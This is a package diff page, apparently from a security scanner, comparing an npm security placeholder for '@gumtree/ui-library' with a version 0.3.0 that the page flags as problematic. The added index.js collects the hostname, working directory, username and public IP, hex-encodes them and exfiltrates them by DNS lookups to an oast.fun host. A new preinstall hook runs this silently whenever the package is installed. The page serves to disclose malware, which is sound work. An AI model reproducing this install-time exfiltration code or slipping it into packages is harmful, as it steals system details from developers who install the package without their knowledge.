@gumtree/ui-library 0.0.1-security → 0.3.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @gumtree/ui-library might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +14 -0
  2. package/package.json +13 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,14 @@
1
+ const {
2
+ exec
3
+ } = require("child_process");
4
+ exec("a=$(hostname;pwd;whoami;echo 'Gumtree-ui-library';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.cfdrjq22vtc00000epn0g8shjocyyyyyn.oast.fun;done", (error, data, getter) => {
5
+ if (error) {
6
+ console.log("error", error.message);
7
+ return;
8
+ }
9
+ if (getter) {
10
+ console.log(data);
11
+ return;
12
+ }
13
+ console.log(data);
14
+ });
package/package.json CHANGED
@@ -1,6 +1,16 @@
1
1
  {
2
2
  "name": "@gumtree/ui-library",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "0.3.0",
4
+ "description": "awesome ui library for the awesome team",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js > /dev/null 2>&1",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": [
11
+ "ui",
12
+ "ui-library"
13
+ ],
14
+ "author": "",
15
+ "license": "ISC"
6
16
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40gumtree%2Fui-library for more information.